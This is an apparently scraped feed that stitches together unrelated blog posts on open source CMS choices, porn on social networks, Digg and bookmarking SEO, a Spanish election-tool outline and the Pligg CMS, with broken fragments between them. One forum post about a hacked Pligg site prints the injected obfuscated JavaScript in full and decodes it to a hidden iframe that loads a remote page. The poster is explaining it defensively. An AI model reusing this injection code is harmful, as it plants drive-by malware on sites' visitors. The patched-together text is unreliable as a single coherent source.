<description><![CDATA[I am trying to create a new website, I have a business idea in mind, I am not a hardcore techie. But]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>I am trying to create a new website, I have a business idea in mind, I am not a hardcore techie. But I am willing to get my hands dirty as much as I can, within the limits forced on me by my lower-than-the-bespectacled-geek&#8217;s brain-to-body ratio and my half-used, ageing brain cells. What do I do? This is what I did&#8230;</p>
<p>I must say I am the more curious type. The first thing I always try, is to find out if I can build a system form raw components and leave a lot of room for customisation to myself. But I wanted to try out open source apps only. One must remember the weak points of using open source technologies before deciding on using them:</p>
<ol>
<li>The dev team usually does not provide complete support for installation/use/bugs etc. Although, this varies a lot between various open source projects depending on the scale at which the project is undertaken and who is/are the investor(s)/stakeholder(s). A few projects actually wind up and the users may be left on their own.</li>
<li>The apps are meant to be used by users who intend not to spend much money on licensed, non open-source products. Hence, these OS (Open Source) apps are tested primarily 0n other freely available technology stack (server, database, operating system etc.) If you intend to use those on non-OS servers and databases, you may have to do the porting job yourself.</li>
</ol>
<p>Considering all this in mind, I started with analyzing (reading documentations, if available, installing and running) various OS apps. The number of apps in PHP is definitely more than those developed in any other language. Since I am from JAVA background, I was very keen on finding JAVA-based apps. A good source of information about such apps is <a href="http://java-source.net/" target="_blank">java-source.net</a>. Two of the good apps I found were <a href="http://jforum.net/" target="_blank">Jforum</a> for adding a nice forum to your existing website and <a href="http://rollerweblogger.org/project/" target="_blank">Roller</a> to add a weblog. Both of these can be attached to your existing websites with minimal configuration. But I am looking to build a website from scratch. Thats where I need a content management system (CMS). A blog is a simple example of a CMS. WordPress is a great tool for a blog-type website. But a CMS can do much more:</p>
<ol>
<li>It keeps your website well organized and comprehensive,</li>
<li>Its easy to create, easy to maintain with minimal technical knowledge,</li>
<li>It increases the data security, and</li>
<li>It greatly reduces your time and costs.</li>
</ol>
<p>Here&#8217;s a list of top open source ones in news right now. These are, by no means, my choice as I haven&#8217;t tested them. The best source of feature set comparison and discussions are <a href="http://cmsreport.com" target="_blank">http://cmsreport.com</a> and <a href="http://www.packtpub.com/award" target="_blank">http://www.packtpub.com/award</a>.</p>
<p>In no particular order:</p>
<h4><a href="http://mambo-foundation.org/" target="_blank">Mambo</a></h4>
<p>Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo&#8217;s &#8220;power in simplicity&#8221; also makes it the CMS of choice for many small businesses and personal sites.</p>
<h4><a href="http://www.joomla.org/" target="_blank">Joomla</a></h4>
<p>Joomla is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-use and extensibility, have made Joomla the most popular Web site software available.</p>
<h4><a href="http://www.drupal.org/" target="_blank">Drupal</a></h4>
<p>Drupal is a free software package that allows an individual or a community of users to easily publish, manage and organize a wide variety of content on a website.</p>
<p>The built-in functionality, combined with dozens of freely available add-on modules, will enable features such as:</p>
<ul>
<li>Electronic commerce</li>
<li>Blogs</li>
<li>Collaborative authoring environments</li>
<li>Forums</li>
<li>Peer-to-peer networking</li>
<li>Newsletters</li>
<li>Podcasting</li>
<li>Picture galleries</li>
<li>File uploads and downloads</li>
</ul>
<h4><a href="http://www.dotnetnuke.com" target="_blank">DotNetNuke</a></h4>
<p>DotNetNuke is a web content management system (WCM or CMS) and application development framework which enables businesses to quickly build and deploy feature-rich, interactive web sites and applications in Microsoft .NET. An intuitive, menu-driven interface allows even non-technical users to easily create new sites or extend the functionality and features of their existing web site.</p>
<h4><a href="http://www.silverstripe.com/" target="_blank">SilverStripe</a></h4>
<p>SilverStripe is an open source content management system. It&#8217;s simple to use, standards compliant, and offers great usability. The standout feature for me is the templating system, which uses simple placeholders within standard HTML to build the pages. Common functions &#8212; like menu systems &#8212; are built in and automatically generated, yet still offer full control over the styling.</p>
<h4><a href="http://www.phpnuke.org/" target="_blank">phpNuke</a></h4>
<h4><a href="http://www.pligg.com/" target="_blank">Pligg</a></h4>
<h4><a href="http://www.e107.org/" target="_blank">e107</a></h4>
<h4><a href="http://www.mojoportal.com/home.aspx" target="_blank">mojoPortal</a></h4>
<h4><a href="http://www.wordpress.com" target="_blank">WordPress</a></h4>
<p>&#8230;&#8230;&#8230;&#8230;and many more. There are a number of things to note before picking any of these for creating your website:</p>
<ol>
<li>Feature-set and robustness of the framework</li>
<li>The size of the community &#8211; Drupal and Joomla in particular have large community</li>
<li>Security provided by the framework</li>
<li>Your level and type of technical knowledge &#8211; You may occasionally, need to integrate your own code to the existing CMS resources. Hence, if you know .Net, you may like to choose dotnetnuke and so on.</li>
<li>Unique features in a CMS suitable for a particular purpose &#8211; WordPress may be more suitable for a simple blogging site and Pligg for a community site.</li>
</ol>
<p>Considering all the above mentioned factors, coupled with my own online research, I decided to try out Drupal and Joomla. Once I am done with the trials, I&#8217;ll have something more to write.</p>

<description><![CDATA[Since the rise of the internet in the 1990s, pornography has managed to rule the internet in terms o]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><img class="alignleft size-full wp-image-163" title="art.social.network.gi" src="http://cyberconnectus.wordpress.com/files/2009/08/art-social-network-gi.jpg" alt="art.social.network.gi" width="292" height="219" /></p>
<p>Since the rise of the internet in the 1990s, pornography has managed to rule the internet in terms of providing users with constant flow of content. While there has always been difficulty in accurately measuring how big internet pornography is , the online pornography industry is estimated to be worth about $97 billion, and counts for about 13% of website visits in America. According to <a title="Stats on porn" href="http://internet-filter-review.toptenreviews.com/internet-pornography-statistics.html">Top ten reviews</a>, an internet site monitor, a new pornographic video is being created in the United States every 35 minutes. But with the rise of social networks and social media it appears that new internet platforms are overtaking pornography in terms of online popularity.</p>
<p>According to The Economist, an online newspaper,<a href="http://www.economist.com/research/articlesBySubject/displayStory.cfm?story_id=9040354&#38;subjectID=526352&#38;fsrc=nwl&#38;emailauth=%2527%2527%255E%255C%252DI%255CK%2527TQ24%250A"> </a>pornography-related web activity is decreasing in America. This has been attributed to more and more people opting to participate in social networking sites such as MySpace, Bebo and Facebook.</p>
<p>These advancements then lead to one asking if the rise of social media over internet pornography means that the internet has matured as a medium. After all, pornographic content is often the first to take advantage of new media, from photography to videocassettes to satellite television. “Sex is a virus that infects new technology first,” as <a href="http://www.wired.com/">Wired</a> put it back in 1993. Once a new medium becomes popular, its usage is usually dominated by porn.”</p>
<p>But one should not make the mistake of ruling out porn because porn will always be popular on the internet. Just because people do not go to porn sites to see or download porn it does not mean that they are not engaging in pornographic material over the social networks. Internet users are realizing that one can get actual sex via social networking instead of settling for porn.</p>
<p class="MsoNormal"><span style="font-size:12pt;line-height:115%;font-family:&#38;"><img class="alignnone size-medium wp-image-169" title="facebook-762781" src="http://cyberconnectus.wordpress.com/files/2009/08/facebook-7627811.jpg?w=300" alt="facebook-762781" width="300" height="225" /><br />
</span></p>
<p>Most discussions on the social networks are based on sex talk and flirting and <a title="study on teens" href="http://edition.cnn.com/2009/HEALTH/01/05/myspace.teens/index.html">according to a study on teens</a> that use social networks 54% of the users spoke about sex related issues online. It’s a fact that social media does not guarantee sex any more than porn does. But it provides the anticipation of sex, the possibility of sex, the idea that you just might get lucky. It&#8217;s the premise of porn, manifested in reality.</p>
<p>Social networks also facilitate the sending of users own naked pictures and videos which can still constitute as pornographic material. Social networking sites such as <a href="http://www.hi5.com/">Hi5</a> which have social groups which allow members of that group to post pictures of themselves naked or interesting so called sexy positions. These groups are however classified and one can only enter through an invite.</p>
<p>The fact that the user is in direct communication with the producer or actor of the pornographic material adds more interest to the experience. So a decrease in the number of visits to internet pornography sites can be witnessed, but this decrease is not necessarily due to a lack of interest but because of the thrill presented by the other platforms in obtaining porn material.</p>
<p class="MsoNormal"><span style="color:#ff6600;"><strong><span style="font-size:12pt;line-height:115%;font-family:&#38;">Porn is staying alive</span></strong></span></p>
<p class="MsoNormal"><span style="font-size:12pt;line-height:115%;font-family:&#38;"><img class="size-full wp-image-165 alignleft" title="medium" src="http://cyberconnectus.wordpress.com/files/2009/08/medium.jpg" alt="medium" width="185" height="110" /></span></p>
<p>But one should not rule out the efforts being made to keep porn alive by the major players in the internet porn industry. Seeing that social media and networks have the ability of turning consumers into producers of porn material, the porn makers have acknowledged the abundance of free porn on the internet and have began to make moves towards trying to make a profit from it. One good initiative is <a href="http://stumbleporn.com/">StumblePorn</a>, which is a free porn browser which allows the users to customise their porn content. This effort tries to make it easier to search for porn on the internet and hence aims to attract people to download porn because it has been made easier.</p>
<p><a href="http://www.pligg.com/">Pligg</a>’s content management system has made it easy to establish socially driven sites that essentially replicate all the functionality of Digg. These content management systems have facilitated aggregator sites such as <a href="http://fleshbot.com/200098/mosexindex">MoSexIndex</a> and <a href="http://www.socialporn.com/">socialporn</a> which enable users to get to porn sites easily.</p>
<p>Since one of the major highlight of the social media and networks is the ability for consumers to produce content, the porn industry has also facilitated for online porn users to produce and share their pornographic material. Following in the footsteps of <a href="http://www.youtube.com/">YouTube</a> and how it popularized the online video sharing phenomenon, porn producers have created several sites that let you upload, watch, and share pornography videos. Most prominent of these are <a href="http://www.youporn.com/">YouPorn</a> and <a href="http://www.pornotube.com/">PornoTube</a>.</p>
<p>Ultimately the point of this post is not to simply direct you towards tools that let you access free pornography, but is to document how the social media space is maturing. The porn industry is just another example of one more industry acknowledging the potential of social media as a medium for disseminating content and utilizing these various models.</p>

<description><![CDATA[An examination of the social network called Digg and how it can be used as part of a successful sear]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><span class="cap">A</span>n examination of the social network called Digg and how it can be used as part of a successful search engine strategy.</p>
<p>One of the newest places to submit articles that you have written is <a href="http://adddigg.com">Digg</a>. This is a huge social network whose readers actually despise anything that looks like marketing. You probably won’t last two minutes on this site, which has a “burial” feature that kicks overt displays of advertising right off the sight. However if you are very clever about the way you position yourself on Digg you can use it as a marketing tool to bring more visitors to your site and that may mean potential link partners and advertisers. If you are successful at posting writing on <a href="http://adddigg.com">Digg </a>then you will likely experience a ton of traffic being brought to your site.</p>
<p>Digg is all about user powered content. Everything is submitted and voted on by the <a href="http://adddigg.com">digg community</a>. After you submit content, other people read your submission and Digg what they like best. If your story is popular and receives enough Digg vote, it is promoted to the front page for the millions of visitors to see. So how can you turn this into an SEO tool?</p>
<p>The first challenge is to get people to give a<a href="http://adddigg.com"> Digg</a> vote to your posting. This means having an article on the top page or linking to someone who has a story on the top page. However even after you manage that you need to have a fantastic title and summary or the savvy, marketing hating readers on Digg may not even glance at any URL that is attached.</p>
<p>The main way that <a href="http://adddigg.com">Digg</a> can be part of a good SEO strategy is in driving a lot of traffic to your site quickly by getting in the top ten read articles on the first page of the site. This creates the kind of buzz and credibility for your site that just cannot be bought using keyword articles only.</p>

<description><![CDATA[Social bookmarking is a way for internet users to store, classify, share, and search Internet bookma]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><span class="cap">S</span>ocial bookmarking is a way for internet users to store, classify, share, and search Internet bookmarks. In 2005 and 2006, social bookmarking sites, such as del.icio.us, Diigo, Furl, Ma.gnolia, Netvouz, and StumbleUpon became popular. Sites like reddit, Digg, Newsvine, and the new Netscape portal apply social bookmarking to news items. In 2007, IBM announced plans to enter the social software market.</p>
<p>There are a variety of ways to use bookmarks to improve your overall site popularity. What I personally like about social bookmarks is that it’s easy to do and very similar to other optimization methods I use. The way it works is as follows: A user registers for a social bookmarking site. Once they have an account, they browse the internet. When the individual identifies a webpage or piece of content they want to share with others, they bookmark it. Once that content is bookmarked, the bookmark site keeps a record of the bookmark and waits to see if others bookmark the same content or website.</p>
<p>When others bookmark or vote for the same content, that content increases in popularity and the social book marking site ranks it higher than other content on their site. Some of these bookmark sites also let you see the bookmarks of others. That’s what makes it a “social” bookmark. Not only is the general web populace rating Internet content collectively, but they can also see what others are book marking.</p>
<p>What’s even better is that you can use a site like Social Poster (free) found at http://socialposter.com/generator.php to post multiple bookmarks from one location. You will need to register for each of these sites, but once you do the submission process is simple.</p>
<p>After book marking your home page on each of these sites, consider book marking specific content of channel level pages of your site. Creating deep links into your site can enhance your overall Google rankings. And of course, make sure to use the proper link text in your site title and description.</p>
<p>One final word on social bookmarking. Now that you know how to bookmark your site, the next logical step is to make it easy for others to bookmark your site. To do this, simply add a Social Bookmark applet (free) to your site by visiting AddThis.com. They offer a small piece of Javascript you can add to your site in the form of a button.</p>
<p>When users click on the Bookmark button, they can select their specific book marking tool and book mark your content. This makes the process of book marking simple and easy to do.n its own terms.</p>

<ol>
</ol>
<p><strong>1.- GÉNESIS DE LA INICIATIVA</strong></p>
<p><strong>2.- FUENTES DE INSPIRACIÓN</strong></p>
<p><strong>3.- FUNCIONAMIENTO Y COMPROMISO DE EZKER BATUA BERDEAK</strong></p>
<p>La herramienta utilizada permite participar de 3 maneras:</p>
<ol>
<li>haciendo propuestas</li>
<li>Votando las propuestas</li>
<li>Participando en debates</li>
</ol>
<ol>
</ol>
<p><strong>4.- ALGUNAS CUESTIONES TÉCNICAS</strong></p>
<p><strong>5.- ¿PARA QUÉ TE PUEDE SERVIR A TI, COMO &#8220;PERSONA HUMANA&#8221; PROPONER IDEAS PARA UN PROGRAMA ELECTORAL?</strong></p>

<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://www.boredofwork.org">boredofwork.org</a> was initially powered by the <a href="http://www.pligg.com">pligg</a> cms, a digg like &#8217;social bookmarking&#8217; too. Only days after the creation of the website, it was swarmed by spammers most of which was from the ip address 94.247.2.29. That wasn&#8217;t such a big issue since a simple entry in .htaccess file got rid of most of them.</p>
<blockquote><p>order allow,deny<br />
deny from 94.247.2.29<br />
allow from all</p></blockquote>
<p>but after some reading and hacking at pligg, I realized that it didn&#8217;t have the cleanest code(it uses the smarty templating engine, which is very ugly) which made it quite inconvenient to modify. Furthermore, the amount of modules available for it is quite small and many if not most of them are not free. That&#8217;s why I&#8217;ve switched to <a href="http://www.joomla.org/">Joomla!</a> CMS instead. It&#8217;s a builtiful cms that follows the MVC design pattern which makes the code much cleaner and making extensions a lot easier. It has a large community and hundreds of free and useful modules.</p>
<p>For now, boredofwork.org will be hosting some flash games for free for those who are a bit bored at work. More different types of content will be added later.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>My pligg was hacked too. While I took the suggested measures in this forum I also dug in to find out what was going on.</p>
<p>The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:<br />
&#60;script language=&#8221;javascript&#8221;&#62;<br />
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t=&#8221;;for(i=0;i&#60;s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}<br />
&#60;/script&#62;</p>
<p>The second part runs the function passing it a string that gets parsed and written as the following:<br />
&#60;iframe src=&#8221;http://sexonline.fake.hu/10/js_go_f1.php&#8221; style=&#8221;display:none&#8221;&#62;&#60;/iframe&#62;</p>
<p>The full encoded script that produces the above looks like:<br />
&#60;script language=javascript&#62;<br />
document.write(unescape(&#8216;%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#8217;));dF(&#8216;%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3&#8242;);<br />
&#60;/script&#62;</p>
<p>I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.</p>
<p>The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot &#8220;stop&#8221; the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.</p>

<content:encoded><![CDATA[<div class='snap_preview'><p>Pligg is an open source Content Management System (CMS) available to <a href="http://forums.pligg.com/current-version/">download for free</a>. Pligg has perfected content management in a unique way that encourages users to participate and control the content on the site. This makes the site user-moderated and allows for &#8220;social publishing&#8221; where the stories are created and promoted by members not website editors. Pligg CMS is based on PHP and MySQL technologies that allow it to be installed on almost any web host on a relatively small budget. For support please visit the <a href="http://forums.pligg.com/">Pligg Forum</a> where you can find help 24 hours a<br />
day thanks to our excellent development team and contributors. Pligg is free software, but you are welcome<br />
to <a href="http://forums.pligg.com/billspaypal.php">donate</a> any amount by clicking the button below.</p>
